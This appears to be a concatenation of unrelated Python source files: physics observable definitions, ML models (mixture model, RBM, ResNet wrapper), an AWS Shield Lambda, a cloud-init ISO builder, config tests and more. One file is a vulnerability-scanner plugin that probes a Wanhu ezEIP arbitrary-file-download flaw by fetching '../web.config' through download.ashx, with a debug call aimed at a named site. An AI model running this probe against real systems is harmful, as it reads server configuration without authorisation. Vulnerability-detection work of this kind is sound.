        _obs.tex = r"$\langle R_{" + _tex[l[0]] + ' ' + _tex[l[1]] + r"} \rangle(" + _hadr_l[M]['tex'] + r"\ell^+\nu)$"
        for li in l:
            for N in _hadr_l[M]['decays']:
                # add taxonomy for both processes (e.g. D->Penu and D->Pmunu) and for charged and neutral
                _obs.add_taxonomy(_process_taxonomy + _hadr[N]['tex'] + _tex[li]+r"^+\nu_"+_tex[li]+r"$")
        Prediction(_obs_name, BR_binned_leptonflavour_function(_hadr_l[M]['D'], _hadr_l[M]['P'], l[0], l[1]))
        # ratio of total BRs
        _obs_name = "R"+l[0]+l[1]+"("+M+"lnu)"
        _obs = Observable(name=_obs_name)
        _obs.set_description(r"Ratio of total branching ratios of $" + _hadr_l[M]['tex'] +_tex[l[0]]+r"^+ \nu_"+_tex[l[0]]+r"$" + " and " + r"$" + _hadr_l[M]['tex'] +_tex[l[1]]+r"^+ \nu_"+_tex[l[1]]+r"$")
        _obs.tex = r"$R_{" + _tex[l[0]] + ' ' + _tex[l[1]] + r"}(" + _hadr_l[M]['tex'] + r"\ell^+\nu)$"
        for li in l:
            for N in _hadr_l[M]['decays']:
                # add taxonomy for both processes (e.g. D->Penu and D->Pmunu) and for charged and neutral
                _obs.add_taxonomy(_process_taxonomy + _hadr[N]['tex'] +_tex[li]+r"^+\nu_"+_tex[li]+r"$")
        Prediction(_obs_name, BR_tot_leptonflavour_function(_hadr_l[M]['D'], _hadr_l[M]['P'], l[0], l[1]))
|
import json
from ingest import ingest_json_body
from housepy import config, log, strings, util
def parse(request):
    """Parse an incoming Ambit sample request into a flat data dict.

    Returns the parsed dict on success.  NOTE(review): on ingest failure
    the (preserved) behavior is to return the tuple
    ``(None, "Could not parse")`` -- callers must handle both shapes.
    """
    log.info("ambit.parse")
    sample = ingest_json_body(request)
    if sample is None:
        return sample, "Could not parse"
    data = {}
    for key, value in sample.items():
        if key == "UTC":
            dt = util.parse_date(value)  # these are marked UTC in the data
            data['t_utc'] = util.timestamp(dt)
            continue
        # idiom fix: isinstance instead of `type(value) != str`;
        # non-string values are skipped (presumably nested/structural
        # entries -- TODO confirm against the feed schema)
        if not isinstance(value, str):
            continue
        data[key] = strings.as_numeric(value)
    return data
|
from typing import List, Union
import torch
from torch import nn, optim
from torch.distributions import Distribution
from tqdm import tqdm
class GeneralizedMixtureModel(nn.Module):
    """Mixture model over arbitrary learnable torch distribution
    modules, fitted with an EM-like scheme.

    Each component in `distributions` must be an ``nn.Module`` exposing
    a differentiable ``log_prob(data)`` and a ``sample()`` method.  The
    E-step computes soft cluster assignments; the M-step performs
    `maximization_step` Adam updates on the component parameters with
    the assignments held fixed.
    """
    def __init__(self,
                 distributions: List[nn.Module],
                 max_iter=1000,
                 rtol=1e-8,
                 random_state=123,
                 init_cluster_ratio=None,
                 maximization_step=100,
                 learning_rate=0.001):
        super().__init__()
        self.distributions = nn.ModuleList(distributions)
        self.max_iter = max_iter  # maximum number of EM iterations
        self.rtol = rtol  # relative log-prob tolerance for convergence
        torch.manual_seed(random_state)
        self.maximization_step = maximization_step  # gradient steps per M-step
        self.cluster_num = len(distributions)
        # mixing weights: uniform unless an initial ratio is supplied
        # (which is normalised to sum to 1)
        if init_cluster_ratio is None:
            self.cluster_ratio = torch.ones(self.cluster_num) / self.cluster_num
        else:
            self.cluster_ratio = init_cluster_ratio / init_cluster_ratio.sum()
        self.optimizer = optim.Adam(self.parameters(), lr=learning_rate)

    def fit(self, data):
        """Run EM until `max_iter` iterations or the relative change of
        the total log-likelihood drops below `rtol`."""
        prev_log_prob = self.log_prob(data)
        with tqdm(range(self.max_iter)) as pbar:
            for _iter in pbar:
                posterior = self.expectation(data)
                self.maximization(data, posterior)
                log_prob = self.log_prob(data)
                # converged when the relative improvement is tiny
                if abs(log_prob - prev_log_prob) / abs(prev_log_prob) < self.rtol:
                    break
                pbar.set_postfix({"log_prob": log_prob})
                prev_log_prob = log_prob

    def log_prob(self, data):
        """Total (summed over samples) mixture log-likelihood."""
        with torch.no_grad():
            # prob: (n_clusters, n_samples) per-component likelihoods
            prob = torch.stack([dist.log_prob(data).exp() for dist in self.distributions])
            mixture_log_prob = self.cluster_ratio.matmul(prob).log().sum()
            return mixture_log_prob

    def predict(self, data):
        """Return soft assignments (posterior responsibilities), not
        hard labels."""
        return self.expectation(data)

    def fit_predict(self, data):
        """Fit the model, then return soft assignments for `data`."""
        self.fit(data)
        return self.predict(data)

    def expectation(self, data):
        """E-step: posterior responsibility of each cluster per sample,
        normalised over clusters (dim 0)."""
        with torch.no_grad():
            prob = torch.stack([dist.log_prob(data).exp() for dist in self.distributions])
            posterior = self.cluster_ratio.unsqueeze(-1) * prob
            return posterior / posterior.sum(dim=0)

    def maximization(self, data, posterior):
        """M-step: closed-form update of the mixing weights, followed by
        gradient ascent on the expected complete-data log-likelihood."""
        eps = 1e-7  # guards log() against zero mixing weights
        self.cluster_ratio = posterior.mean(dim=1)
        for _step in range(self.maximization_step):
            self.optimizer.zero_grad()
            log_prob = torch.stack([dist.log_prob(data) for dist in self.distributions])
            # negative evidence lower bound under fixed responsibilities
            minus_lower_bound = - ((log_prob + (self.cluster_ratio+eps).log().unsqueeze(-1)) * posterior).mean()
            loss = minus_lower_bound # TODO: prior loss
            if torch.isnan(loss):
                raise NotImplementedError
            loss.backward()
            self.optimizer.step()

    def sample(self, n_sample):
        """Draw `n_sample` points: choose a component per draw according
        to the mixing weights, then sample that component once.
        Returns (component_indices, stacked_samples)."""
        class_sample = torch.multinomial(self.cluster_ratio, n_sample, replacement=True)
        return class_sample, torch.stack([self.distributions[i].sample() for i in class_sample])
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = Warsong
#_PlugName_ = Wanhu ezEIP arbitrary file download (万户ezeip任意文件下载)
#_Function_ = plugin format (插件格式)
#_FileName_ = whezeip_Download_Anything.py
def assign(service, arg):
    """Scanner-framework hook: accept the target when the service is
    'whezeip' (returns ``(True, arg)``); otherwise return None
    implicitly to decline."""
    if service != "whezeip":
        return None
    return True, arg
def audit(arg):
    """Probe the ezEIP arbitrary-file-download endpoint by fetching
    web.config; raise a security warning when its content markers
    appear in the response body."""
    target = arg + 'download.ashx?files=../web.config'
    code, head, body, errcode, fina_url = curl.curl(target)
    if code == 200 and 'rootRollingFile' in body and 'cachingConfiguration' in body:
        security_warning(target)
# Stand-alone debug entry: run the PoC against a sample host using the
# scanner framework's dummy stubs (which provide curl/security_warning).
if __name__ == '__main__':
    from dummy import *
    audit(assign('whezeip', 'http://www.zsty.org/')[1])
import pandas as pd
import logging
from typing import Union
from pathlib import Path
from ecat.tables import reimport_log, reimport, product_code
from ecat.db import Connections
from ecat.classroom import artikel
from ecat.analysis import generate_analysis, compare_data
from ecat.sql import get_template_config, render_sql, series_to_str
from ecat.version import __version__
from datetime import datetime
import warnings
warnings.filterwarnings("ignore")
logger = logging.getLogger(__name__)
# NOTE(review): `format` shadows the builtin of the same name at module
# scope; harmless here (only used in basicConfig) but worth renaming.
format = '%(asctime)s %(message)s'
datefmt='%d %b %y %H:%M:%S'
logging.basicConfig(level=logging.INFO, format=format, datefmt=datefmt)
logger.info(f'ecat version {__version__}')
def classroom_upload(filename: Path, database: str='eCatalogDEV',
                     last_update: Union[None, str]=None, update: bool=False) -> None:
    ''' Upload classroom item data to the Baxter eCatalogue database.
    The function attempts to capture the process of updating the e-Catalogue
    database with class.room database item data:
    - For given CSV file import, validate & transform to a pandas dataframe.
    - Make a connection to test/production eCatalogue database
    - Read reimport_log table to determine last time reimport table
    - was updated. Use this date to filter out records in CSV file that
    - have been 'updated' since this date.
    - Filter the CSV data using the last_updated date.
    - Make a connection to the reimport table, check that the columns
    - match what is already identified in the CSV data file.
    - If no 'missing data' in the CSV, upload the CSV to the reimport table.
    Parameters
    ----------
    filename
        name of CSV extract file containing articles/item data from class.room
    database
        name of e-Catalogue database.
        Valid values are: eCatalogDEV, eCatalogPRD
    last_update
        Default None. If None, use the last_update from reimport log table.
        Can be specified to manually override reimport log table value or
        used for testing.
    update
        Default False. If True, upload/merge CSV data with reimport table.
        Update 'last updated' on reimport log table with filename date.
    Returns
    -------
    None
    Example
    -------
    from ecat.ecat import classroom_upload
    filename = Path('inputs') / 'export_artikel_20220204200253.csv'
    classroom_upload(filename=filename, database='eCatalogDEV',
                     last_update='20211102', update=True)
    '''
    connections = Connections()
    con = connections.get_connection(database)
    if con is None:
        # no usable DB connection; nothing to do
        return
    # Determine the cut-off date for 'updated' records: either the log
    # table's value or a manual YYYYMMDD override (testing).
    if last_update is None:
        log_table = reimport_log(connection=con)
        last_updated = log_table.get_last_update()
    else:
        last_updated = datetime.strptime(last_update, '%Y%m%d')
        logger.info('')
        logger.info('<< ::TEST:: RE-IMPORT DATE - MANUAL OVERRIDE >>')
        logger.info('')
    logger.info('1. Import classroom data, filter')
    classroom_data = artikel(filename)
    csv_file_date = classroom_data.get_filename_date()
    if csv_file_date < last_updated:
        # CSV extract predates the last DB refresh -> stale, bail out
        msg = f'CSV file date {csv_file_date} < last DB update {last_updated}'
        logger.info(msg)
        # idiom fix: dropped the extraneous f-string prefix (the message
        # has no placeholders); emitted text is unchanged
        logger.info('NO UPDATE TO eCatalogue database.')
        return
    df = classroom_data.filter_data(filter_date=last_updated)
    if classroom_data.invalid_data():
        return
    logger.info('')
    logger.info('2. Get Reimport table meta-data')
    reimport_table = reimport(connection=con)
    reimport_columns = reimport_table.get_columns()
    # column sets must line up exactly before attempting an upload
    if list(df.columns) != list(reimport_columns):
        msg = f'Error: CSV cols {len(df.columns)} <> Re-import cols {len(reimport_columns)}'
        logger.info(msg)
        return
    if not update:
        logger.info('<< ::TEST:: NO UPDATES MADE >>')
    else:
        logger.info('')
        logger.info('3. Upload classroom item data')
        reimport_table.upload(df)
        logger.info('')
        logger.info('4. Update reimport_log with last update')
        log_table = reimport_log(connection=con)
        log_table.insert(last_updated)
def classroom_analyse(filename: Path, database: str='eCatalogDEV',
                      last_update: Union[None, str]=None) -> None:
    ''' Analyse classroom item data before updating Baxter eCatalogue database.

    This function analyses/compares classroom item data:

    - Get classroom CSV data, filter by date and identify all item 'keys'
      to allow retrieval of corresponding product and p_product data.
    - Analyse/compare classroom items with corresponding items in eCAT DB.
      Generate Excel workbook showing item, status and whether or not the
      classroom item exists in the eCAT product and p_product tables.
    - Generate two further 'difference' Excel workbooks showing:
      a) Items common to classroom and products
      b) Items common to classroom and p_products

    Parameters
    ----------
    filename
        name of CSV extract file containing articles/item data from class.room
    database
        name of e-Catalogue database.
        Valid values are: eCatalogDEV, eCatalogPRD
    last_update
        Default None. If None, use the last_update from reimport log table.
        Can be specified ('YYYYMMDD') to manually override the reimport log
        table value, or used for testing.

    Returns
    -------
    None
    '''
    connections = Connections()
    con = connections.get_connection(database)
    if con is None:
        # No usable database connection — nothing can be done.
        return
    logger.info('')
    classroom_data = artikel(filename)
    if last_update is None:
        # Normal path: watermark date comes from the reimport log table.
        log_table = reimport_log(connection=con)
        last_updated = log_table.get_last_update()
    else:
        # Manual override (testing): parse the supplied YYYYMMDD string.
        last_updated = datetime.strptime(last_update, '%Y%m%d')
        logger.info('')
        logger.info('<< ::TEST:: RE-IMPORT DATE - MANUAL OVERRIDE >>')
    logger.info('')
    logger.info('1. Import classroom data, filter')
    df_classroom = (classroom_data.filter_data(filter_date=last_updated)
                    .sort_values('PRODUCTCODE_ID'))
    if classroom_data.invalid_data():
        # artikel reported validation problems; stop the analysis.
        return
    classroom_keys = classroom_data.get_keys()
    logger.info('')
    logger.info('2. Using classroom item keys, get productcode, p_productcode')
    product = product_code(keys=classroom_keys, published=False, connection=con)
    df_product = product.get_dataframe(common_fields_only=True)
    p_product = product_code(keys=classroom_keys, published=True, connection=con)
    df_p_product = p_product.get_dataframe(common_fields_only=True)
    logger.info('')
    logger.info('3. Analyse classroom items with eCAT DB product data')
    df_analysis = generate_analysis(df_classroom, df_product, df_p_product)
    logger.info('')
    logger.info('4. Compare differences between common classroom & eCAT DB items')
    df_common_classroom = classroom_data.get_dataframe(common_fields_only=True)
    classroom_items = df_common_classroom['PRODUCTCODE_ID']
    # Identify common rows between classroom and product table
    keys = df_analysis['PRODUCTCODE_ID'].loc[df_analysis['PRODUCT']].tolist()
    df_classroom_product = df_common_classroom[classroom_items.isin(keys)]
    df_classroom_product = df_classroom_product.reset_index(drop=True)
    # Identify common rows between classroom and p_product table
    keys = df_analysis['PRODUCTCODE_ID'].loc[df_analysis['P_PRODUCT']].tolist()
    df_classroom_p_product = df_common_classroom[classroom_items.isin(keys)]
    df_classroom_p_product = df_classroom_p_product.reset_index(drop=True)
    logger.info('')
    # Write the two 'difference' workbooks to the outputs directory.
    f ='outputs/ECAT_CSV_vs_PRODUCT.xlsx'
    df_compare = compare_data(df_classroom_product, df_product, df_classroom,
                              table1='csv', table2='product', filename=f)
    f ='outputs/ECAT_CSV_vs_P_PRODUCT.xlsx'
    df_compare = compare_data(df_classroom_p_product, df_p_product, df_classroom,
                              table1='csv', table2='p_product', filename=f)
def render_sqls(filename: str=None) -> None:
    ''' Generate rendered SQL's to update eCatalogue DB

    Overview
    --------
    - Read classroom/ecat analysis workbook.
    - Read template/substitution values for each of the
      FOUR business rules (to update product/p_product tables).
    - Filter item data and extract associated item codes in
      a 'string' list - based on the business cases above.
    - Apply above values to the appropriate SQL template and
      render/create an SQL file in the 'outputs' directory.
      (look in templates/templates_config.json for details)

    Parameters
    ----------
    filename
        Excel workbook containing list of classroom items
        and corresponding info on whether item exists in
        productcode and p_productcode tables in eCatalogue DB

    Returns
    -------
    None

    Example
    -------
    from ecat.ecat import render_sqls

    f = 'outputs/20220215_ECAT_Classroom_Item_Analysis - TEST.xlsx'
    render_sqls(filename=f)
    '''
    # Read classroom/ecat analysis summary Excel workbook
    # NOTE(review): relies on pandas being available as `pd` at module level;
    # no `import pandas as pd` is visible in this module's import block — confirm.
    df = pd.read_excel(filename)
    # Make sure column name spaces replaced with underscores
    df.columns = df.columns.str.replace(' ', '_')
    template_config = get_template_config()
    # Stage 1: items not in status 1000218 that exist in product -> UPDATE
    stage1 = template_config['stage1']
    result = df.query("ARTICLE_STATUS != 1000218 and PRODUCT")
    stage1['articles'] = series_to_str(result['PRODUCTCODE_ID'])
    render_sql(template_sql='UPDATE.sql', template_values=stage1)
    # Stage 2: status 10260 items that exist in p_product -> UPDATE
    stage2 = template_config['stage2']
    result = df.query("ARTICLE_STATUS == 10260 and P_PRODUCT")
    stage2['articles'] = series_to_str(result['PRODUCTCODE_ID'])
    render_sql(template_sql='UPDATE.sql', template_values=stage2)
    # Stage 3: status 10260 items missing from p_product -> INSERT
    stage3 = template_config['stage3']
    result = df.query("ARTICLE_STATUS == 10260 and not (P_PRODUCT)")
    stage3['articles'] = series_to_str(result['PRODUCTCODE_ID'])
    render_sql(template_sql='INSERT.sql', template_values=stage3)
    # Stage 4: retired statuses present in p_product -> DELETE
    stage4 = template_config['stage4']
    result = df.query("ARTICLE_STATUS in (10257, 10262, 10263, 10264) and P_PRODUCT")
    stage4['articles'] = series_to_str(result['PRODUCTCODE_ID'])
    render_sql(template_sql = 'DELETE.sql', template_values=stage4)
|
import torch
class RBM:
    """Bernoulli Restricted Boltzmann Machine trained with contrastive divergence.

    `weights` has shape (hidden_dim, visible_dim); the biases are row vectors
    of shape (1, hidden_dim) and (1, visible_dim). No autograd is used — the
    CD update in `train` mutates the tensors in place.
    """

    def __init__(self, visible_dim, hidden_dim):
        # Standard-normal random initialisation of all parameters.
        self.weights = torch.randn(hidden_dim, visible_dim)
        self.hidden_bias = torch.randn(1, hidden_dim)
        self.visible_bias = torch.randn(1, visible_dim)

    def sample_hidden(self, input):
        """Return (p(h=1|v), Bernoulli sample of h) for a batch of visible rows."""
        weighted_input = torch.mm(input, self.weights.t())
        activation = weighted_input + self.hidden_bias.expand_as(weighted_input)
        prob_h_given_v = torch.sigmoid(activation)
        return prob_h_given_v, torch.bernoulli(prob_h_given_v)

    def sample_visible(self, hidden_input):
        """Return (p(v=1|h), Bernoulli sample of v) for a batch of hidden rows."""
        weighted_input = torch.mm(hidden_input, self.weights)
        activation = weighted_input + self.visible_bias.expand_as(weighted_input)
        prob_v_given_h = torch.sigmoid(activation)
        return prob_v_given_h, torch.bernoulli(prob_v_given_h)

    def train(self, initial_visible, curr_visible, initial_prob_h, curr_prob_h):
        """Apply one contrastive-divergence update from the start (v0, p(h|v0))
        and end (vk, p(h|vk)) of a Gibbs chain.

        Fixes two defects in the previous version:
        - the weight update used mm(v.t(), p_h), whose (visible, hidden) shape
          cannot be added to the (hidden, visible) weight matrix;
        - the hidden-bias update passed a *tuple* to torch.sum (a TypeError)
          instead of the difference of the two probability tensors.
        """
        self.weights += (torch.mm(initial_prob_h.t(), initial_visible)
                         - torch.mm(curr_prob_h.t(), curr_visible))
        self.visible_bias += torch.sum((initial_visible - curr_visible), 0)
        self.hidden_bias += torch.sum((initial_prob_h - curr_prob_h), 0)
|
#
# -*- coding: utf-8 -*-
#
# This file is part of reclass
#
from reclass.values import item
from reclass.utils.dictpath import DictPath
from reclass.errors import ResolveError
class RefItem(item.ItemWithReferences):
    """A reference item: renders its sub-items, joins them into one string and
    resolves that string as a delimiter-separated path into the context."""

    type = item.ItemTypes.REFERENCE

    def assembleRefs(self, context=None):
        """Record the reference string this item contributes to `self._refs`.

        Fix: `context` previously defaulted to a shared mutable `{}`; it now
        defaults to None with a fresh dict created per call (backward
        compatible for every caller).
        """
        if context is None:
            context = {}
        super(RefItem, self).assembleRefs(context)
        try:
            strings = [str(i.render(context, None)) for i in self.contents]
            self._refs.append("".join(strings))
        except ResolveError:
            # A sub-item could not be rendered yet: mark the refs incomplete.
            self.allRefs = False

    def _resolve(self, ref, context):
        """Look up the textual reference `ref` as a path into `context`."""
        path = DictPath(self._settings.delimiter, ref)
        try:
            return path.get_value(context)
        except (KeyError, TypeError):
            # Missing key or non-indexable node — surface as a resolve failure.
            raise ResolveError(ref)

    def render(self, context, inventory):
        """Render all sub-items and resolve the joined result in `context`."""
        # Fast path: a single sub-item needs no string join.
        if len(self.contents) == 1:
            return self._resolve(self.contents[0].render(context, inventory),
                                 context)
        strings = [str(i.render(context, inventory)) for i in self.contents]
        return self._resolve("".join(strings), context)

    def __str__(self):
        # Wrap the joined sub-items in the configured reference sentinels.
        strings = [str(i) for i in self.contents]
        rs = self._settings.reference_sentinels
        return '{0}{1}{2}'.format(rs[0], ''.join(strings), rs[1])
|
from torchvision.models.resnet import ResNet, BasicBlock, Bottleneck
import torch
from torch import nn
class ResNet_LJ(nn.Module):
    """Wrapper around torchvision's ResNet that re-exposes the backbone layers
    and optionally skips the final average-pool + FC head (is_FC=False returns
    the layer4 feature maps instead of logits)."""

    def __init__(self, model_name, is_FC = True):
        """Build the requested ResNet variant.

        Raises
        ------
        ValueError
            if `model_name` is not a supported ResNet variant. (Previously an
            unknown name crashed later with UnboundLocalError on `basic_model`.)
        """
        super().__init__()
        valid = ('resnet18', 'resnet34', 'resnet50', 'resnet101', 'resnet152')
        if model_name not in valid:
            raise ValueError(
                'model_name must be one of {}, got {!r}'.format(valid, model_name))
        if model_name == 'resnet18':
            basic_model = ResNet(block=BasicBlock, layers=[2,2,2,2])
        elif model_name == 'resnet34':
            basic_model = ResNet(block=BasicBlock, layers=[3,4,6,3])
        elif model_name == 'resnet50':
            basic_model = ResNet(block=Bottleneck, layers=[3,4,6,3])
        elif model_name == 'resnet101':
            basic_model = ResNet(block=Bottleneck, layers=[3,4,23,3])
        else:  # 'resnet152'
            basic_model = ResNet(block=Bottleneck, layers=[3,8,36,3])
        self.is_FC = is_FC
        # Re-register the torchvision layers as this module's own submodules.
        self.conv1 = basic_model.conv1
        self.bn1 = basic_model.bn1
        self.relu = basic_model.relu
        self.maxpool = basic_model.maxpool
        self.layer1 = basic_model.layer1
        self.layer2 = basic_model.layer2
        self.layer3 = basic_model.layer3
        self.layer4 = basic_model.layer4
        self.avgpool = basic_model.avgpool
        self.fc = basic_model.fc

    def forward(self, x):
        x = self.conv1(x)
        x = self.bn1(x)
        x = self.relu(x)
        x = self.maxpool(x)
        x = self.layer1(x)
        x = self.layer2(x)
        x = self.layer3(x)
        x = self.layer4(x)
        if self.is_FC:
            # Classification head: pooled features flattened into logits.
            x = self.avgpool(x)
            x = x.reshape(x.size(0), -1)
            x = self.fc(x)
        return x

    @classmethod
    def from_name(cls, model_name, in_channels=3, is_FC=True):
        """Alternate constructor: build by name and adapt the input channels."""
        model = cls(model_name, is_FC)
        model._change_in_channels(in_channels)
        return model

    @classmethod
    def from_pretrained(cls, model_name, in_channels=3, model_path = None, is_FC=True):
        """Alternate constructor: build by name, optionally load weights from
        `model_path` (strict=False, so partial checkpoints are tolerated),
        then adapt the input channels."""
        model = cls(model_name, is_FC)
        if model_path:
            # NOTE(review): torch.load on an untrusted checkpoint can execute
            # arbitrary code via pickle — only load trusted files.
            state_dict = torch.load(model_path)
            ret = model.load_state_dict(state_dict, strict=False)
            print('Loaded pretrained weights for {}'.format(model_name))
        model._change_in_channels(in_channels)
        return model

    def _change_in_channels(self, in_channels):
        """Adjust model's first convolution layer to in_channels, if in_channels not equals 3.

        Args:
            in_channels (int): Input data's channel number.
        """
        if in_channels != 3:
            self.conv1 = nn.Conv2d(in_channels, 64, kernel_size=7, stride=2, padding=3,
                                   bias=False)
import sys
sys.path.insert(0,'./fms/lambda/global-accelerator-protection')
import boto3
import os
import botocore
import logging
import json
import copy
import cfnresponse
from tag_check import tag_check
# Lambda that reconciles AWS Shield Advanced protections for Global
# Accelerators against a tag-based include/exclude policy (tag_check).
logger = logging.getLogger('shieldProtection')
logger.setLevel('DEBUG')
# Global Accelerator's API lives in us-west-2 only; Shield uses the default region.
ga_client = boto3.client('globalaccelerator',region_name='us-west-2')
ga_paginator = ga_client.get_paginator('list_accelerators')
shield_client = boto3.client('shield')
shield_paginator = shield_client.get_paginator('list_protections')

def lambda_handler(event, context):
    """Create/delete Shield protections so they match each accelerator's tags.

    When invoked as a CloudFormation custom resource ('RequestType' present in
    the event), failures and success are reported via cfnresponse.
    """
    responseData = {}
    # List all Global Accelerators in the account
    try:
        accelerators = (ga_paginator.paginate().build_full_result())['Accelerators']
        logger.debug(accelerators)
    except botocore.exceptions.ClientError as error:
        logger.error(error.response['Error']['Message'])
        if 'RequestType' in event:
            responseData['Error'] = error.response['Error']
            cfnresponse.send(event, context, cfnresponse.FAILED, responseData, "PaginateAccleratorsFailed")
        return (error.response['Error']['Message'])
    # List of Shield Protected Resources
    try:
        shieldProtected = (shield_paginator.paginate().build_full_result())['Protections']
        logger.debug(shieldProtected)
    except botocore.exceptions.ClientError as error:
        logger.error(error.response['Error']['Message'])
        if 'RequestType' in event:
            responseData['Error'] = error.response['Error']
            cfnresponse.send(event, context, cfnresponse.FAILED, responseData, "PaginateShieldprotectionFailed")
        return (error.response['Error']['Message'])
    protectedArns = []
    protectionIdList = {}
    # Build a list of just resource ARN's for Shield Protected resources,
    # plus ARN -> protection id for later deletions.
    for s in shieldProtected:
        protectedArns.append(s['ResourceArn'])
        protectionIdList[s['ResourceArn']] = s['Id']
    # If no accelerators exist, stop gracefully now
    if accelerators == []:
        logger.info("No Global Accelerators")
        return ()
    else:
        # Reconcile each accelerator individually.
        for accelerator in accelerators:
            logger.debug(accelerator)
            acceleratorArn = accelerator['AcceleratorArn']
            try:
                tags = ga_client.list_tags_for_resource(
                    ResourceArn=acceleratorArn
                )['Tags']
            except botocore.exceptions.ClientError as error:
                if 'RequestType' in event:
                    responseData['Error'] = error.response['Error']
                    cfnresponse.send(event, context, cfnresponse.FAILED, responseData, "listTagsFailed")
                logger.error(error.response['Error']['Message'])
                return (error.response['Error']['Message'])
            # Check resource tags vs. checkTags as include/exclude logic
            tagResults = tag_check(tags)
            # Whether the accelerator is currently Shield protected
            isProtected = acceleratorArn in protectedArns
            # If tags match and it isn't protected
            if tagResults == True and isProtected == False:
                logger.info ("Not protected and should be")
                try:
                    shield_client.create_protection(
                        Name=accelerator['Name'],
                        ResourceArn=acceleratorArn)
                except botocore.exceptions.ClientError as error:
                    logger.error(error.response['Error']['Message'])
                    if 'RequestType' in event:
                        responseData['Error'] = error.response['Error']
                        cfnresponse.send(event, context, cfnresponse.FAILED, responseData, "ShieldCreateProtectionFailed")
                    return (error.response['Error']['Message'])
            # If tags do not match requirements and it is Shield protected
            elif tagResults == False and isProtected == True:
                logger.info ("Protected and should not be")
                protectionId = protectionIdList[acceleratorArn]
                try:
                    shield_client.delete_protection(
                        ProtectionId=protectionId)
                except botocore.exceptions.ClientError as error:
                    logger.error(error.response['Error']['Message'])
                    if 'RequestType' in event:
                        responseData['Error'] = error.response['Error']
                        cfnresponse.send(event, context, cfnresponse.FAILED, responseData, "ShieldDeleteProtectionFailed")
                    return (error.response['Error']['Message'])
            # The other possible results require no change/action for this resource
            #   - passed check tags and is already protected
            #   - did not pass check tags and is not protected
            else:
                logger.info("No change to protection needed")
    if 'RequestType' in event:
        cfnresponse.send(event, context, cfnresponse.SUCCESS, responseData, "GAProtectionSucceeded")
def integral(a_i, h, n):
    """Approximate the integral of cos(x) over [a_i, a_i + n*h] using the
    midpoint rule with n sub-intervals of width h.

    Fix: `cos` was called without ever being imported in this module, which
    raised NameError at runtime.

    Parameters
    ----------
    a_i : float  -- left endpoint of the integration interval
    h   : float  -- width of each sub-interval
    n   : int    -- number of sub-intervals (n == 0 returns 0.0)
    """
    from math import cos  # local import keeps the fix self-contained

    integ = 0.0
    for j in range(n):
        a_ij = a_i + (j + 0.5) * h  # midpoint of the j-th sub-interval
        integ += cos(a_ij) * h
    return integ
|
import logging

# Attach a default handler to the root logger so records emitted through this
# module's logger are not silently dropped when the host application has not
# configured logging itself.
logging.basicConfig()
logger = logging.getLogger(__name__)
|
import tempfile
import yaml
from utils import shell
import os
import logging
class CloudInit(object):
    """Builds (and removes) per-VM cloud-init seed ISOs.

    Each ISO (volume label 'cidata') carries a `meta-data` file (instance id /
    hostname) and a `user-data` #cloud-config document (hostname plus optional
    fstab mount entries derived from the VM's disk specs).
    """

    def __init__(self, run_qcow_path):
        # Directory where the generated seed ISOs are written.
        self.iso_base_path = run_qcow_path

    def _write_metadata(self, vm, filepath):
        """Write the cloud-init `meta-data` file for *vm* to *filepath*."""
        with open(filepath, 'w') as f:
            f.write("instance-id: %s\n" % vm.name)
            f.write("local-hostname: %s\n" % vm.name)

    def _write_userdata(self, vm, filepath):
        """Write the `user-data` #cloud-config file, including any disk mounts.

        Raises ValueError when a disk specifies a mount point without both a
        serial/UUID and a filesystem type.
        """
        mounts = []
        for disk in vm.disks:
            disk_uuid = disk.get('serial', None)
            mount_point = disk.get('mount', None)
            fs = disk.get('fs', None)
            # We cannot perform mount if there is a mountpoint specified and there is no fs or uuid
            if mount_point is not None:
                if disk_uuid is None or fs is None:
                    raise ValueError(f"vm: {vm.name} invalid disk parameters {disk} uuid and fs must be specified")
                mounts.append([f"UUID={disk_uuid}", mount_point, fs, "defaults", "0", "0"])
        data = {"preserve_hostname": False,
                "hostname": vm.name,
                "output" : {"all": ">> /var/log/cloud-init.log"},
                "mounts" : mounts}
        with open(filepath, 'w') as f:
            f.write("#cloud-config\n")
            yaml.dump(data, f)

    def _iso_path(self, vm):
        # One ISO per VM, keyed by name and uuid so re-runs are unambiguous.
        return os.path.join(self.iso_base_path, "%s_%s.iso" % (vm.name, vm.uuid))

    def generate_iso(self, vm):
        """Create the seed ISO for *vm* and return its filesystem path."""
        iso_path = self._iso_path(vm)
        # Fix: the old debug message read `vm.cloud_init_iso`, an attribute not
        # used anywhere else in this class (and an AttributeError risk); log
        # the path actually being generated instead.
        logging.debug(f"Generating iso for vm {vm.name} iso: {iso_path}")
        with tempfile.TemporaryDirectory() as tmpdir:
            user_data = os.path.join(tmpdir, "user-data")
            meta_data = os.path.join(tmpdir, "meta-data")
            self._write_metadata(vm, meta_data)
            self._write_userdata(vm, user_data)
            cmd = f"mkisofs -o {iso_path} -V cidata -J -r {user_data} {meta_data}"
            shell.run_cmd(cmd)
        return iso_path

    def delete_iso(self, vm):
        """Remove the VM's seed ISO from disk."""
        iso_path = self._iso_path(vm)
        os.remove(iso_path)
|
from cdocs.simple_config import SimpleConfig
import unittest
class ConfigTests(unittest.TestCase):
noise = False
def _print(self, text:str) -> None:
if self.noise:
print(text)
def off(self) -> bool:
return False
def test_get_config_items(self):
self._print(f"ConfigTests.test_get_config_items")
if self.off(): return
cfg = SimpleConfig()
items = cfg.get_items("docs", ["public"])
self._print(f"test_get_config_items: items: {items}")
self.assertEqual( len(items), 4, msg=f"must be 3 items for docs, not {items}" )
items = cfg.get_items("fish")
self.assertEqual( len(items), 0, msg=f"must be 0 items for fish, not {items}" )
def test_get_with_default(self):
self._print(f"ConfigTests.test_get_with_default")
if self.off(): return
cfg = SimpleConfig()
oh = cfg.get("fish", "bats", "yeah!")
self._print(f"test_get_with_default: {oh}")
self.assertEqual( oh, "yeah!", msg="must equal the default value" )
def test_get_matching_key_for_value(self):
self._print(f"ConfigTests.test_get_matching_key_for_value")
if self.off(): return
cfg = SimpleConfig()
name = cfg.get_matching_key_for_value("docs", "/Users/davidkershaw/dev/cdocs/docs/internal")
self._print(f"ConfigTests.test_get_matching_key_for_value: name1: {name}")
self.assertEqual( name, "internal", msg="must equal the 'internal' root" )
name = cfg.get_matching_key_for_value("docs", "fish")
self._print(f"ConfigTests.test_get_matching_key_for_value: name2: {name}")
self.assertNotEqual( name, "internal", msg="must not equal the 'internal' root" )
|
#!/usr/bin/env python
from __future__ import print_function
# Table of every built-in runtime parameter: name -> (python type, default).
# The type selects which C dispatch block and struct field is generated.
default_pars = {'nx1': (int, 128),
                'nx2': (int, 1),
                'nx3': (int, 1),
